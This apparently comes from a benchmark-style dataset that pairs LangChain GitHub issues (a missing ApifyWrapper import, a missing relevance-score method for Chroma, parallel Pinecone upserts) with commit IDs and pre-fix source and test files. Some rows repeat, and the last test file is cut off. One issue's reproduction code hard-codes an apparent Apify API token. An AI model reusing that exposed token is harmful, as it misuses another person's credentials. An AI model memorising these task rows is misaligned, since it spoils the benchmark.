ImportError: cannot import name 'ApifyWrapper' from 'langchain.utilities'
### System Info Hi All, I tried to run Apify tutorial and I ran on the issue of ImportError: cannot import name 'ApifyWrapper' from 'langchain.utilities'. I checked the Utilities library under utilities/__init__.py and I couldn't find anything under the Generic integrations with third-party systems and packages. Any thoughts or support? ### Who can help? @hwchase17, @agola ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [X] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction import os openai.api_key = os.environ["OPEN_API_KEY"] os.environ["APIFY_API_TOKEN"] = "apify_api_qNa00bcYGUYFwIZltWiOuhskmer7E61VE6GN" apify = ApifyWrapper() loader = apify.call_actor( actor_id="apify/website-content-crawler", run_input={"startUrls": [{"url": "https://python.langchain.com/en/latest/"}]}, dataset_mapping_function=lambda item: Document( page_content=item["text"] or "", metadata={"source": item["url"]} ), ) index = VectorstoreIndexCreator().from_loaders([loader]) query = "What is LangChain?" result = index.query_with_sources(query) print(result["answer"]) print(result["sources"]) ### Expected behavior LangChain is a standard interface through which you can interact with a variety of large language models (LLMs). It provides modules that can be used to build language model applications, and it also provides chains and agents with memory capabilities. https://python.langchain.com/en/latest/modules/models/llms.html, https://python.langchain.com/en/latest/getting_started/getting_started.html
https://github.com/langchain-ai/langchain/issues/8307
https://github.com/langchain-ai/langchain/pull/10067
02e51f4217207eed4fc9ac89735cf1f660be3f10
86646ec555970e01130994dc75f3a0c5d4e52de9
"2023-07-26T18:18:22Z"
python
"2023-08-31T22:47:44Z"
libs/langchain/langchain/utilities/__init__.py
"""**Utilities** are the integrations with third-part systems and packages. Other LangChain classes use **Utilities** to interact with third-part systems and packages. """ from langchain.utilities.alpha_vantage import AlphaVantageAPIWrapper from langchain.utilities.arxiv import ArxivAPIWrapper from langchain.utilities.awslambda import LambdaWrapper from langchain.utilities.bash import BashProcess from langchain.utilities.bibtex import BibtexparserWrapper from langchain.utilities.bing_search import BingSearchAPIWrapper from langchain.utilities.brave_search import BraveSearchWrapper from langchain.utilities.duckduckgo_search import DuckDuckGoSearchAPIWrapper from langchain.utilities.golden_query import GoldenQueryAPIWrapper from langchain.utilities.google_places_api import GooglePlacesAPIWrapper from langchain.utilities.google_search import GoogleSearchAPIWrapper from langchain.utilities.google_serper import GoogleSerperAPIWrapper from langchain.utilities.graphql import GraphQLAPIWrapper from langchain.utilities.jira import JiraAPIWrapper from langchain.utilities.max_compute import MaxComputeAPIWrapper from langchain.utilities.metaphor_search import MetaphorSearchAPIWrapper from langchain.utilities.openweathermap import OpenWeatherMapAPIWrapper from langchain.utilities.portkey import Portkey from langchain.utilities.powerbi import PowerBIDataset from langchain.utilities.pubmed import PubMedAPIWrapper from langchain.utilities.python import PythonREPL from langchain.utilities.requests import Requests, RequestsWrapper, TextRequestsWrapper from langchain.utilities.scenexplain import SceneXplainAPIWrapper from langchain.utilities.searx_search import SearxSearchWrapper from langchain.utilities.serpapi import SerpAPIWrapper from langchain.utilities.spark_sql import SparkSQL from langchain.utilities.sql_database import SQLDatabase from langchain.utilities.tensorflow_datasets import TensorflowDatasets from langchain.utilities.twilio import TwilioAPIWrapper from langchain.utilities.wikipedia import WikipediaAPIWrapper from langchain.utilities.wolfram_alpha import WolframAlphaAPIWrapper from langchain.utilities.zapier import ZapierNLAWrapper __all__ = [ "AlphaVantageAPIWrapper", "ArxivAPIWrapper", "BashProcess", "BibtexparserWrapper", "BingSearchAPIWrapper", "BraveSearchWrapper", "DuckDuckGoSearchAPIWrapper", "GoldenQueryAPIWrapper", "GooglePlacesAPIWrapper", "GoogleSearchAPIWrapper", "GoogleSerperAPIWrapper", "GraphQLAPIWrapper", "JiraAPIWrapper", "LambdaWrapper", "MaxComputeAPIWrapper", "MetaphorSearchAPIWrapper", "OpenWeatherMapAPIWrapper", "Portkey", "PowerBIDataset", "PubMedAPIWrapper", "PythonREPL", "Requests", "RequestsWrapper", "SQLDatabase", "SceneXplainAPIWrapper", "SearxSearchWrapper", "SerpAPIWrapper", "SparkSQL", "TensorflowDatasets", "TextRequestsWrapper", "TextRequestsWrapper", "TwilioAPIWrapper", "WikipediaAPIWrapper", "WolframAlphaAPIWrapper", "ZapierNLAWrapper", ]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,307
ImportError: cannot import name 'ApifyWrapper' from 'langchain.utilities'
### System Info Hi All, I tried to run Apify tutorial and I ran on the issue of ImportError: cannot import name 'ApifyWrapper' from 'langchain.utilities'. I checked the Utilities library under utilities/__init__.py and I couldn't find anything under the Generic integrations with third-party systems and packages. Any thoughts or support? ### Who can help? @hwchase17, @agola ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [X] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction import os openai.api_key = os.environ["OPEN_API_KEY"] os.environ["APIFY_API_TOKEN"] = "apify_api_qNa00bcYGUYFwIZltWiOuhskmer7E61VE6GN" apify = ApifyWrapper() loader = apify.call_actor( actor_id="apify/website-content-crawler", run_input={"startUrls": [{"url": "https://python.langchain.com/en/latest/"}]}, dataset_mapping_function=lambda item: Document( page_content=item["text"] or "", metadata={"source": item["url"]} ), ) index = VectorstoreIndexCreator().from_loaders([loader]) query = "What is LangChain?" result = index.query_with_sources(query) print(result["answer"]) print(result["sources"]) ### Expected behavior LangChain is a standard interface through which you can interact with a variety of large language models (LLMs). It provides modules that can be used to build language model applications, and it also provides chains and agents with memory capabilities. https://python.langchain.com/en/latest/modules/models/llms.html, https://python.langchain.com/en/latest/getting_started/getting_started.html
https://github.com/langchain-ai/langchain/issues/8307
https://github.com/langchain-ai/langchain/pull/10067
02e51f4217207eed4fc9ac89735cf1f660be3f10
86646ec555970e01130994dc75f3a0c5d4e52de9
"2023-07-26T18:18:22Z"
python
"2023-08-31T22:47:44Z"
libs/langchain/langchain/utilities/apify.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,201
DOC: Apify integration missing
### Issue with current documentation: The Apify integration has been delete by @hwchase17 in commit aa0e69bc98fa9c77b01e5104f12b2b779f64fd33 and thus this documentation is not valid anymore: https://python.langchain.com/docs/integrations/tools/apify ### Idea or request for content: It would be highly beneficial to have information on a suitable replacement for the Apify integration.
https://github.com/langchain-ai/langchain/issues/8201
https://github.com/langchain-ai/langchain/pull/10067
02e51f4217207eed4fc9ac89735cf1f660be3f10
86646ec555970e01130994dc75f3a0c5d4e52de9
"2023-07-24T19:46:13Z"
python
"2023-08-31T22:47:44Z"
libs/langchain/langchain/utilities/__init__.py
"""**Utilities** are the integrations with third-part systems and packages. Other LangChain classes use **Utilities** to interact with third-part systems and packages. """ from langchain.utilities.alpha_vantage import AlphaVantageAPIWrapper from langchain.utilities.arxiv import ArxivAPIWrapper from langchain.utilities.awslambda import LambdaWrapper from langchain.utilities.bash import BashProcess from langchain.utilities.bibtex import BibtexparserWrapper from langchain.utilities.bing_search import BingSearchAPIWrapper from langchain.utilities.brave_search import BraveSearchWrapper from langchain.utilities.duckduckgo_search import DuckDuckGoSearchAPIWrapper from langchain.utilities.golden_query import GoldenQueryAPIWrapper from langchain.utilities.google_places_api import GooglePlacesAPIWrapper from langchain.utilities.google_search import GoogleSearchAPIWrapper from langchain.utilities.google_serper import GoogleSerperAPIWrapper from langchain.utilities.graphql import GraphQLAPIWrapper from langchain.utilities.jira import JiraAPIWrapper from langchain.utilities.max_compute import MaxComputeAPIWrapper from langchain.utilities.metaphor_search import MetaphorSearchAPIWrapper from langchain.utilities.openweathermap import OpenWeatherMapAPIWrapper from langchain.utilities.portkey import Portkey from langchain.utilities.powerbi import PowerBIDataset from langchain.utilities.pubmed import PubMedAPIWrapper from langchain.utilities.python import PythonREPL from langchain.utilities.requests import Requests, RequestsWrapper, TextRequestsWrapper from langchain.utilities.scenexplain import SceneXplainAPIWrapper from langchain.utilities.searx_search import SearxSearchWrapper from langchain.utilities.serpapi import SerpAPIWrapper from langchain.utilities.spark_sql import SparkSQL from langchain.utilities.sql_database import SQLDatabase from langchain.utilities.tensorflow_datasets import TensorflowDatasets from langchain.utilities.twilio import TwilioAPIWrapper from langchain.utilities.wikipedia import WikipediaAPIWrapper from langchain.utilities.wolfram_alpha import WolframAlphaAPIWrapper from langchain.utilities.zapier import ZapierNLAWrapper __all__ = [ "AlphaVantageAPIWrapper", "ArxivAPIWrapper", "BashProcess", "BibtexparserWrapper", "BingSearchAPIWrapper", "BraveSearchWrapper", "DuckDuckGoSearchAPIWrapper", "GoldenQueryAPIWrapper", "GooglePlacesAPIWrapper", "GoogleSearchAPIWrapper", "GoogleSerperAPIWrapper", "GraphQLAPIWrapper", "JiraAPIWrapper", "LambdaWrapper", "MaxComputeAPIWrapper", "MetaphorSearchAPIWrapper", "OpenWeatherMapAPIWrapper", "Portkey", "PowerBIDataset", "PubMedAPIWrapper", "PythonREPL", "Requests", "RequestsWrapper", "SQLDatabase", "SceneXplainAPIWrapper", "SearxSearchWrapper", "SerpAPIWrapper", "SparkSQL", "TensorflowDatasets", "TextRequestsWrapper", "TextRequestsWrapper", "TwilioAPIWrapper", "WikipediaAPIWrapper", "WolframAlphaAPIWrapper", "ZapierNLAWrapper", ]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,201
DOC: Apify integration missing
### Issue with current documentation: The Apify integration has been delete by @hwchase17 in commit aa0e69bc98fa9c77b01e5104f12b2b779f64fd33 and thus this documentation is not valid anymore: https://python.langchain.com/docs/integrations/tools/apify ### Idea or request for content: It would be highly beneficial to have information on a suitable replacement for the Apify integration.
https://github.com/langchain-ai/langchain/issues/8201
https://github.com/langchain-ai/langchain/pull/10067
02e51f4217207eed4fc9ac89735cf1f660be3f10
86646ec555970e01130994dc75f3a0c5d4e52de9
"2023-07-24T19:46:13Z"
python
"2023-08-31T22:47:44Z"
libs/langchain/langchain/utilities/apify.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
3,685
TimeWeightedVectorStoreRetriever (TWVSR) and ChromaDb vector store - base.py
Hi there. Realise there is a lot happening and this this looks to be something that has been missed. When trying to use TWVSR with ChromaDb it errors because of the lack of implementation of the following, namely __similarity_search_with_relevance_scores, inside of base.py `def _similarity_search_with_relevance_scores( self, query: str, k: int = 4, **kwargs: Any, ) -> List[Tuple[Document, float]]: """Return docs and relevance scores, normalized on a scale from 0 to 1. 0 is dissimilar, 1 is most similar. """ raise NotImplementedError` Trying to make a work-around now Many thanks Ian
https://github.com/langchain-ai/langchain/issues/3685
https://github.com/langchain-ai/langchain/pull/9906
bc8cceebf7b2d8e056b905926a6009367b6a8b14
4dc47bd3acc8928359773fc3fb80d289b9eae55e
"2023-04-28T00:16:05Z"
python
"2023-09-03T22:05:30Z"
libs/langchain/langchain/retrievers/time_weighted_retriever.py
import datetime from copy import deepcopy from typing import Any, Dict, List, Optional, Tuple from langchain.callbacks.manager import CallbackManagerForRetrieverRun from langchain.pydantic_v1 import Field from langchain.schema import BaseRetriever, Document from langchain.vectorstores.base import VectorStore def _get_hours_passed(time: datetime.datetime, ref_time: datetime.datetime) -> float: """Get the hours passed between two datetimes.""" return (time - ref_time).total_seconds() / 3600 class TimeWeightedVectorStoreRetriever(BaseRetriever): """Retriever that combines embedding similarity with recency in retrieving values.""" vectorstore: VectorStore """The vectorstore to store documents and determine salience.""" search_kwargs: dict = Field(default_factory=lambda: dict(k=100)) """Keyword arguments to pass to the vectorstore similarity search.""" # TODO: abstract as a queue memory_stream: List[Document] = Field(default_factory=list) """The memory_stream of documents to search through.""" decay_rate: float = Field(default=0.01) """The exponential decay factor used as (1.0-decay_rate)**(hrs_passed).""" k: int = 4 """The maximum number of documents to retrieve in a given call.""" other_score_keys: List[str] = [] """Other keys in the metadata to factor into the score, e.g. 'importance'.""" default_salience: Optional[float] = None """The salience to assign memories not retrieved from the vector store. None assigns no salience to documents not fetched from the vector store. """ class Config: """Configuration for this pydantic object.""" arbitrary_types_allowed = True def _get_combined_score( self, document: Document, vector_relevance: Optional[float], current_time: datetime.datetime, ) -> float: """Return the combined score for a document.""" hours_passed = _get_hours_passed( current_time, document.metadata["last_accessed_at"], ) score = (1.0 - self.decay_rate) ** hours_passed for key in self.other_score_keys: if key in document.metadata: score += document.metadata[key] if vector_relevance is not None: score += vector_relevance return score def get_salient_docs(self, query: str) -> Dict[int, Tuple[Document, float]]: """Return documents that are salient to the query.""" docs_and_scores: List[Tuple[Document, float]] docs_and_scores = self.vectorstore.similarity_search_with_relevance_scores( query, **self.search_kwargs ) results = {} for fetched_doc, relevance in docs_and_scores: if "buffer_idx" in fetched_doc.metadata: buffer_idx = fetched_doc.metadata["buffer_idx"] doc = self.memory_stream[buffer_idx] results[buffer_idx] = (doc, relevance) return results def _get_relevant_documents( self, query: str, *, run_manager: CallbackManagerForRetrieverRun ) -> List[Document]: """Return documents that are relevant to the query.""" current_time = datetime.datetime.now() docs_and_scores = { doc.metadata["buffer_idx"]: (doc, self.default_salience) for doc in self.memory_stream[-self.k :] } # If a doc is considered salient, update the salience score docs_and_scores.update(self.get_salient_docs(query)) rescored_docs = [ (doc, self._get_combined_score(doc, relevance, current_time)) for doc, relevance in docs_and_scores.values() ] rescored_docs.sort(key=lambda x: x[1], reverse=True) result = [] # Ensure frequently accessed memories aren't forgotten for doc, _ in rescored_docs[: self.k]: # TODO: Update vector store doc once `update` method is exposed. buffered_doc = self.memory_stream[doc.metadata["buffer_idx"]] buffered_doc.metadata["last_accessed_at"] = current_time result.append(buffered_doc) return result def add_documents(self, documents: List[Document], **kwargs: Any) -> List[str]: """Add documents to vectorstore.""" current_time = kwargs.get("current_time") if current_time is None: current_time = datetime.datetime.now() # Avoid mutating input documents dup_docs = [deepcopy(d) for d in documents] for i, doc in enumerate(dup_docs): if "last_accessed_at" not in doc.metadata: doc.metadata["last_accessed_at"] = current_time if "created_at" not in doc.metadata: doc.metadata["created_at"] = current_time doc.metadata["buffer_idx"] = len(self.memory_stream) + i self.memory_stream.extend(dup_docs) return self.vectorstore.add_documents(dup_docs, **kwargs) async def aadd_documents( self, documents: List[Document], **kwargs: Any ) -> List[str]: """Add documents to vectorstore.""" current_time = kwargs.get("current_time") if current_time is None: current_time = datetime.datetime.now() # Avoid mutating input documents dup_docs = [deepcopy(d) for d in documents] for i, doc in enumerate(dup_docs): if "last_accessed_at" not in doc.metadata: doc.metadata["last_accessed_at"] = current_time if "created_at" not in doc.metadata: doc.metadata["created_at"] = current_time doc.metadata["buffer_idx"] = len(self.memory_stream) + i self.memory_stream.extend(dup_docs) return await self.vectorstore.aadd_documents(dup_docs, **kwargs)
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
9,855
Support index upsert parallelization for pinecone
### Feature request We can take advantage from pinecone parallel upsert (see example: https://docs.pinecone.io/docs/insert-data#sending-upserts-in-parallel) This will require modification of the current `from_texts` pipeline to 1. Create a batch (chunk) for doing embeddings (ie have a chunk size of 1000 for embeddings) 2. Perform a parallel upsert to Pinecone index on that chunk This way we are in control on 3 things: 1. Thread pool for pinecone index 2. Parametrize the batch size for embeddings (ie it helps to avoid rate limit for OpenAI embeddings) 3. Parametrize the batch size for upsert (it helps to avoid throttling of pinecone API) As a part of this ticket, we can consolidate the code between `add_texts` and `from_texts` as they are doing the similar thing. ### Motivation The function `from_text` and `add_text` for index upsert doesn't take advantage of parallelism especially when embeddings are calculated by HTTP calls (ie OpenAI embeddings). This makes the whole sequence inefficient from IO bound standpoint as the pipeline is following: 1. Take a small batch ie 32/64 of documents 2. Calculate embeddings --> WAIT 3. Upsert a batch --> WAIT We can benefit from either parallel upsert or we can utilize `asyncio`. ### Your contribution I will do it.
https://github.com/langchain-ai/langchain/issues/9855
https://github.com/langchain-ai/langchain/pull/9859
16a27ab244e6b92d74c48c206e0e6f1b5d00e126
4765c097035b9ff722fa9bbb7c3dd4eb6aed933c
"2023-08-28T13:09:29Z"
python
"2023-09-03T22:37:41Z"
libs/langchain/langchain/vectorstores/pinecone.py
from __future__ import annotations import logging import uuid import warnings from typing import Any, Callable, Iterable, List, Optional, Tuple, Union import numpy as np from langchain.docstore.document import Document from langchain.embeddings.base import Embeddings from langchain.vectorstores.base import VectorStore from langchain.vectorstores.utils import DistanceStrategy, maximal_marginal_relevance logger = logging.getLogger(__name__) class Pinecone(VectorStore): """`Pinecone` vector store. To use, you should have the ``pinecone-client`` python package installed. Example: .. code-block:: python from langchain.vectorstores import Pinecone from langchain.embeddings.openai import OpenAIEmbeddings import pinecone # The environment should be the one specified next to the API key # in your Pinecone console pinecone.init(api_key="***", environment="...") index = pinecone.Index("langchain-demo") embeddings = OpenAIEmbeddings() vectorstore = Pinecone(index, embeddings.embed_query, "text") """ def __init__( self, index: Any, embedding: Union[Embeddings, Callable], text_key: str, namespace: Optional[str] = None, distance_strategy: Optional[DistanceStrategy] = DistanceStrategy.COSINE, ): """Initialize with Pinecone client.""" try: import pinecone except ImportError: raise ImportError( "Could not import pinecone python package. " "Please install it with `pip install pinecone-client`." ) if not isinstance(index, pinecone.index.Index): raise ValueError( f"client should be an instance of pinecone.index.Index, " f"got {type(index)}" ) if not isinstance(embedding, Embeddings): warnings.warn( "Passing in `embedding` as a Callable is deprecated. Please pass in an" " Embeddings object instead." ) self._index = index self._embedding = embedding self._text_key = text_key self._namespace = namespace self.distance_strategy = distance_strategy @property def embeddings(self) -> Optional[Embeddings]: """Access the query embedding object if available.""" if isinstance(self._embedding, Embeddings): return self._embedding return None def _embed_documents(self, texts: Iterable[str]) -> List[List[float]]: """Embed search docs.""" if isinstance(self._embedding, Embeddings): return self._embedding.embed_documents(list(texts)) return [self._embedding(t) for t in texts] def _embed_query(self, text: str) -> List[float]: """Embed query text.""" if isinstance(self._embedding, Embeddings): return self._embedding.embed_query(text) return self._embedding(text) def add_texts( self, texts: Iterable[str], metadatas: Optional[List[dict]] = None, ids: Optional[List[str]] = None, namespace: Optional[str] = None, batch_size: int = 32, **kwargs: Any, ) -> List[str]: """Run more texts through the embeddings and add to the vectorstore. Args: texts: Iterable of strings to add to the vectorstore. metadatas: Optional list of metadatas associated with the texts. ids: Optional list of ids to associate with the texts. namespace: Optional pinecone namespace to add the texts to. Returns: List of ids from adding the texts into the vectorstore. """ if namespace is None: namespace = self._namespace # Embed and create the documents docs = [] ids = ids or [str(uuid.uuid4()) for _ in texts] embeddings = self._embed_documents(texts) for i, (text, embedding) in enumerate(zip(texts, embeddings)): metadata = metadatas[i] if metadatas else {} metadata[self._text_key] = text docs.append((ids[i], embedding, metadata)) # upsert to Pinecone self._index.upsert( vectors=docs, namespace=namespace, batch_size=batch_size, **kwargs ) return ids def similarity_search_with_score( self, query: str, k: int = 4, filter: Optional[dict] = None, namespace: Optional[str] = None, ) -> List[Tuple[Document, float]]: """Return pinecone documents most similar to query, along with scores. Args: query: Text to look up documents similar to. k: Number of Documents to return. Defaults to 4. filter: Dictionary of argument(s) to filter on metadata namespace: Namespace to search in. Default will search in '' namespace. Returns: List of Documents most similar to the query and score for each """ return self.similarity_search_by_vector_with_score( self._embed_query(query), k=k, filter=filter, namespace=namespace ) def similarity_search_by_vector_with_score( self, embedding: List[float], *, k: int = 4, filter: Optional[dict] = None, namespace: Optional[str] = None, ) -> List[Tuple[Document, float]]: """Return pinecone documents most similar to embedding, along with scores.""" if namespace is None: namespace = self._namespace docs = [] results = self._index.query( [embedding], top_k=k, include_metadata=True, namespace=namespace, filter=filter, ) for res in results["matches"]: metadata = res["metadata"] if self._text_key in metadata: text = metadata.pop(self._text_key) score = res["score"] docs.append((Document(page_content=text, metadata=metadata), score)) else: logger.warning( f"Found document with no `{self._text_key}` key. Skipping." ) return docs def similarity_search( self, query: str, k: int = 4, filter: Optional[dict] = None, namespace: Optional[str] = None, **kwargs: Any, ) -> List[Document]: """Return pinecone documents most similar to query. Args: query: Text to look up documents similar to. k: Number of Documents to return. Defaults to 4. filter: Dictionary of argument(s) to filter on metadata namespace: Namespace to search in. Default will search in '' namespace. Returns: List of Documents most similar to the query and score for each """ docs_and_scores = self.similarity_search_with_score( query, k=k, filter=filter, namespace=namespace, **kwargs ) return [doc for doc, _ in docs_and_scores] def _select_relevance_score_fn(self) -> Callable[[float], float]: """ The 'correct' relevance function may differ depending on a few things, including: - the distance / similarity metric used by the VectorStore - the scale of your embeddings (OpenAI's are unit normed. Many others are not!) - embedding dimensionality - etc. """ if self.distance_strategy == DistanceStrategy.COSINE: return self._cosine_relevance_score_fn elif self.distance_strategy == DistanceStrategy.MAX_INNER_PRODUCT: return self._max_inner_product_relevance_score_fn elif self.distance_strategy == DistanceStrategy.EUCLIDEAN_DISTANCE: return self._euclidean_relevance_score_fn else: raise ValueError( "Unknown distance strategy, must be cosine, max_inner_product " "(dot product), or euclidean" ) def max_marginal_relevance_search_by_vector( self, embedding: List[float], k: int = 4, fetch_k: int = 20, lambda_mult: float = 0.5, filter: Optional[dict] = None, namespace: Optional[str] = None, **kwargs: Any, ) -> List[Document]: """Return docs selected using the maximal marginal relevance. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents. Args: embedding: Embedding to look up documents similar to. k: Number of Documents to return. Defaults to 4. fetch_k: Number of Documents to fetch to pass to MMR algorithm. lambda_mult: Number between 0 and 1 that determines the degree of diversity among the results with 0 corresponding to maximum diversity and 1 to minimum diversity. Defaults to 0.5. Returns: List of Documents selected by maximal marginal relevance. """ if namespace is None: namespace = self._namespace results = self._index.query( [embedding], top_k=fetch_k, include_values=True, include_metadata=True, namespace=namespace, filter=filter, ) mmr_selected = maximal_marginal_relevance( np.array([embedding], dtype=np.float32), [item["values"] for item in results["matches"]], k=k, lambda_mult=lambda_mult, ) selected = [results["matches"][i]["metadata"] for i in mmr_selected] return [ Document(page_content=metadata.pop((self._text_key)), metadata=metadata) for metadata in selected ] def max_marginal_relevance_search( self, query: str, k: int = 4, fetch_k: int = 20, lambda_mult: float = 0.5, filter: Optional[dict] = None, namespace: Optional[str] = None, **kwargs: Any, ) -> List[Document]: """Return docs selected using the maximal marginal relevance. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents. Args: query: Text to look up documents similar to. k: Number of Documents to return. Defaults to 4. fetch_k: Number of Documents to fetch to pass to MMR algorithm. lambda_mult: Number between 0 and 1 that determines the degree of diversity among the results with 0 corresponding to maximum diversity and 1 to minimum diversity. Defaults to 0.5. Returns: List of Documents selected by maximal marginal relevance. """ embedding = self._embed_query(query) return self.max_marginal_relevance_search_by_vector( embedding, k, fetch_k, lambda_mult, filter, namespace ) @classmethod def from_texts( cls, texts: List[str], embedding: Embeddings, metadatas: Optional[List[dict]] = None, ids: Optional[List[str]] = None, batch_size: int = 32, text_key: str = "text", index_name: Optional[str] = None, namespace: Optional[str] = None, upsert_kwargs: Optional[dict] = None, **kwargs: Any, ) -> Pinecone: """Construct Pinecone wrapper from raw documents. This is a user friendly interface that: 1. Embeds documents. 2. Adds the documents to a provided Pinecone index This is intended to be a quick way to get started. Example: .. code-block:: python from langchain import Pinecone from langchain.embeddings import OpenAIEmbeddings import pinecone # The environment should be the one specified next to the API key # in your Pinecone console pinecone.init(api_key="***", environment="...") embeddings = OpenAIEmbeddings() pinecone = Pinecone.from_texts( texts, embeddings, index_name="langchain-demo" ) """ try: import pinecone except ImportError: raise ValueError( "Could not import pinecone python package. " "Please install it with `pip install pinecone-client`." ) indexes = pinecone.list_indexes() # checks if provided index exists if index_name in indexes: index = pinecone.Index(index_name) elif len(indexes) == 0: raise ValueError( "No active indexes found in your Pinecone project, " "are you sure you're using the right API key and environment?" ) else: raise ValueError( f"Index '{index_name}' not found in your Pinecone project. " f"Did you mean one of the following indexes: {', '.join(indexes)}" ) for i in range(0, len(texts), batch_size): # set end position of batch i_end = min(i + batch_size, len(texts)) # get batch of texts and ids lines_batch = texts[i:i_end] # create ids if not provided if ids: ids_batch = ids[i:i_end] else: ids_batch = [str(uuid.uuid4()) for n in range(i, i_end)] # create embeddings embeds = embedding.embed_documents(lines_batch) # prep metadata and upsert batch if metadatas: metadata = metadatas[i:i_end] else: metadata = [{} for _ in range(i, i_end)] for j, line in enumerate(lines_batch): metadata[j][text_key] = line to_upsert = zip(ids_batch, embeds, metadata) # upsert to Pinecone _upsert_kwargs = upsert_kwargs or {} index.upsert(vectors=list(to_upsert), namespace=namespace, **_upsert_kwargs) return cls(index, embedding, text_key, namespace, **kwargs) @classmethod def from_existing_index( cls, index_name: str, embedding: Embeddings, text_key: str = "text", namespace: Optional[str] = None, ) -> Pinecone: """Load pinecone vectorstore from index name.""" try: import pinecone except ImportError: raise ValueError( "Could not import pinecone python package. " "Please install it with `pip install pinecone-client`." ) return cls(pinecone.Index(index_name), embedding, text_key, namespace) def delete( self, ids: Optional[List[str]] = None, delete_all: Optional[bool] = None, namespace: Optional[str] = None, filter: Optional[dict] = None, **kwargs: Any, ) -> None: """Delete by vector IDs or filter. Args: ids: List of ids to delete. filter: Dictionary of conditions to filter vectors to delete. """ if namespace is None: namespace = self._namespace if delete_all: self._index.delete(delete_all=True, namespace=namespace, **kwargs) elif ids is not None: chunk_size = 1000 for i in range(0, len(ids), chunk_size): chunk = ids[i : i + chunk_size] self._index.delete(ids=chunk, namespace=namespace, **kwargs) elif filter is not None: self._index.delete(filter=filter, namespace=namespace, **kwargs) else: raise ValueError("Either ids, delete_all, or filter must be provided.") return None
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
9,855
Support index upsert parallelization for pinecone
### Feature request We can take advantage from pinecone parallel upsert (see example: https://docs.pinecone.io/docs/insert-data#sending-upserts-in-parallel) This will require modification of the current `from_texts` pipeline to 1. Create a batch (chunk) for doing embeddings (ie have a chunk size of 1000 for embeddings) 2. Perform a parallel upsert to Pinecone index on that chunk This way we are in control on 3 things: 1. Thread pool for pinecone index 2. Parametrize the batch size for embeddings (ie it helps to avoid rate limit for OpenAI embeddings) 3. Parametrize the batch size for upsert (it helps to avoid throttling of pinecone API) As a part of this ticket, we can consolidate the code between `add_texts` and `from_texts` as they are doing the similar thing. ### Motivation The function `from_text` and `add_text` for index upsert doesn't take advantage of parallelism especially when embeddings are calculated by HTTP calls (ie OpenAI embeddings). This makes the whole sequence inefficient from IO bound standpoint as the pipeline is following: 1. Take a small batch ie 32/64 of documents 2. Calculate embeddings --> WAIT 3. Upsert a batch --> WAIT We can benefit from either parallel upsert or we can utilize `asyncio`. ### Your contribution I will do it.
https://github.com/langchain-ai/langchain/issues/9855
https://github.com/langchain-ai/langchain/pull/9859
16a27ab244e6b92d74c48c206e0e6f1b5d00e126
4765c097035b9ff722fa9bbb7c3dd4eb6aed933c
"2023-08-28T13:09:29Z"
python
"2023-09-03T22:37:41Z"
libs/langchain/tests/integration_tests/vectorstores/test_pinecone.py
import importlib import os import time import uuid from typing import TYPE_CHECKING, List import numpy as np import pytest from langchain.docstore.document import Document from langchain.embeddings import OpenAIEmbeddings from langchain.vectorstores.pinecone import Pinecone if TYPE_CHECKING: import pinecone index_name = "langchain-test-index" # name of the index namespace_name = "langchain-test-namespace" # name of the namespace dimension = 1536 # dimension of the embeddings def reset_pinecone() -> None: assert os.environ.get("PINECONE_API_KEY") is not None assert os.environ.get("PINECONE_ENVIRONMENT") is not None import pinecone importlib.reload(pinecone) pinecone.init( api_key=os.environ.get("PINECONE_API_KEY"), environment=os.environ.get("PINECONE_ENVIRONMENT"), ) class TestPinecone: index: "pinecone.Index" @classmethod def setup_class(cls) -> None: import pinecone reset_pinecone() cls.index = pinecone.Index(index_name) if index_name in pinecone.list_indexes(): index_stats = cls.index.describe_index_stats() if index_stats["dimension"] == dimension: # delete all the vectors in the index if the dimension is the same # from all namespaces index_stats = cls.index.describe_index_stats() for _namespace_name in index_stats["namespaces"].keys(): cls.index.delete(delete_all=True, namespace=_namespace_name) else: pinecone.delete_index(index_name) pinecone.create_index(name=index_name, dimension=dimension) else: pinecone.create_index(name=index_name, dimension=dimension) # insure the index is empty index_stats = cls.index.describe_index_stats() assert index_stats["dimension"] == dimension if index_stats["namespaces"].get(namespace_name) is not None: assert index_stats["namespaces"][namespace_name]["vector_count"] == 0 @classmethod def teardown_class(cls) -> None: index_stats = cls.index.describe_index_stats() for _namespace_name in index_stats["namespaces"].keys(): cls.index.delete(delete_all=True, namespace=_namespace_name) reset_pinecone() @pytest.fixture(autouse=True) def setup(self) -> None: # delete all the vectors in the index index_stats = self.index.describe_index_stats() for _namespace_name in index_stats["namespaces"].keys(): self.index.delete(delete_all=True, namespace=_namespace_name) reset_pinecone() @pytest.mark.vcr() def test_from_texts( self, texts: List[str], embedding_openai: OpenAIEmbeddings ) -> None: """Test end to end construction and search.""" unique_id = uuid.uuid4().hex needs = f"foobuu {unique_id} booo" texts.insert(0, needs) docsearch = Pinecone.from_texts( texts=texts, embedding=embedding_openai, index_name=index_name, namespace=namespace_name, ) output = docsearch.similarity_search(unique_id, k=1, namespace=namespace_name) assert output == [Document(page_content=needs)] @pytest.mark.vcr() def test_from_texts_with_metadatas( self, texts: List[str], embedding_openai: OpenAIEmbeddings ) -> None: """Test end to end construction and search.""" unique_id = uuid.uuid4().hex needs = f"foobuu {unique_id} booo" texts.insert(0, needs) metadatas = [{"page": i} for i in range(len(texts))] docsearch = Pinecone.from_texts( texts, embedding_openai, index_name=index_name, metadatas=metadatas, namespace=namespace_name, ) output = docsearch.similarity_search(needs, 